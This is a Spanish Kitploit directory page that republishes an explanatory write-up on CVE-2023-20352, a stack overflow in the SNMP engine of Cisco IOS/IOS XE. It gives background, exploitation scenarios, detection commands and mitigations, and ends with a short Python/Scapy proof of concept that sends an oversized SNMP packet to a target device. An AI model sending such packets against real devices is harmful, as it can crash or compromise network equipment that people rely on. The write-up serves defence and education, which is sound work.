Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352 es una vulnerabilidad crítica de desbordamiento de pila en el motor SNMP de Cisco IOS/IOS XE. Con solo paquetes SNMP manipulados, los atacantes remotos pueden bloquear los sistemas u obtener control root. Todas las versiones de SNMP son vulnerables; aplique el parche ahora o arriesgue un compromiso total. | Kitploit
Herramientas/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAprendizaje y Educación
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
hace 10 mesesAún no revisado

CVE-2023-20352 es una vulnerabilidad crítica de desbordamiento de pila en el motor SNMP de Cisco IOS/IOS XE. Con solo paquetes SNMP manipulados, los atacantes remotos pueden bloquear los sistemas u obtener control root. Todas las versiones de SNMP son vulnerables; aplique el parche ahora o arriesgue un compromiso total.

Compartir

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

CVE-2023-20352 es una falla crítica de desbordamiento de pila en el motor SNMP de Cisco IOS/IOS XE. Con solo paquetes SNMP manipulados, los atacantes remotos pueden bloquear sistemas u obtener control root. Todas las versiones de SNMP son vulnerables; aplica los parches ahora o arriesga un compromiso total

Por Mark Malllia

Introducción a SNMP

El Protocolo Simple de Administración de Red (SNMP) es un protocolo fundamental en la administración de redes, que permite a los administradores de sistemas monitorear, configurar y gestionar dispositivos de red. Opera en los puertos 161 (para solicitudes SNMP) y 162 (para traps). SNMP admite tres versiones: v1, v2c y v3, cada una con diferentes niveles de seguridad. Este tema me toca de cerca: mi tesis se centró en SNMP, y Cisco sigue siendo un pilar en mi trabajo diario.

La utilidad de SNMP se extiende al monitoreo en tiempo real, la gestión de inventario y la detección de fallos en las redes. A pesar de su importancia, el papel de SNMP en la gestión de redes también conlleva riesgos de seguridad cuando no está debidamente asegurado, como se observa en la vulnerabilidad CVE-2023-20352.

Qué salió mal: CVE-2023-20352 explicado

CVE-2023-20352 es una falla de desbordamiento de búfer basado en pila de alta gravedad que afecta a los dispositivos Cisco IOS e IOS XE. Reside en el subsistema SNMP, que procesa el tráfico de gestión de red.

Detalles técnicos:

  • Tipo de vulnerabilidad: Desbordamiento de búfer basado en pila (CWE-121)
  • Puntuación CVSS: 7.7 (Alta)
  • Impacto: Posible denegación de servicio (DoS) o ejecución remota de código (RCE)

La vulnerabilidad se desencadena mediante paquetes SNMP manipulados enviados a un dispositivo vulnerable, lo que provoca una comprobación de límites inadecuada y un desbordamiento de pila. Todas las versiones de SNMP se ven afectadas.

Escenarios de explotación

  1. Ataque de bajo privilegio:

    • Acceso requerido: cadena de solo lectura SNMPv2c o credenciales SNMPv3.
    • Impacto: Recarga del dispositivo (DoS).
  2. Ataque de alto privilegio:

    • Acceso requerido: cadena SNMPv1/v2c con credenciales de privilegio 15.
    • Impacto: RCE completo como root.

Detección y verificación

Para detectar vulnerabilidades, los administradores pueden utilizar los siguientes comandos CLI:

root@kitploit:~
show running-config | include snmp-server community
show running-config | include snmp-server group
show snmp

Bloquéalo: medidas de mitigación

  • Aplicación de parches: Cisco ha publicado parches de firmware para las plataformas afectadas.
  • Restringir el acceso SNMP: Limita el acceso a IP de confianza si aún no lo has hecho.
  • Deshabilitar OID vulnerables: Usa comandos como snmp-server view <view-name> <OID> excluded.

Cómo pueden explotarla los atacantes

Una PoC conceptual que utiliza Python y Scapy demuestra la explotabilidad:

root@kitploit:~
from scapy.all import *

# Replace with target IP and SNMP community string
target_ip = "192.168.1.1"
community = "public"

# Craft malicious packet
payload = b"A" * 1024  # Overflow buffer
packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))

send(packet)

Nota: Este es un ejemplo simplificado. La explotación real requiere una elaboración precisa del payload y una escalada de privilegios.

Conclusión

La vulnerabilidad CVE-2023-20352 subraya el papel crítico de SNMP y los riesgos asociados. Las organizaciones deben priorizar la aplicación de parches y asegurar las configuraciones de SNMP para mitigar las amenazas, garantizando la resiliencia de la red frente a ataques emergentes.

Descargar herramienta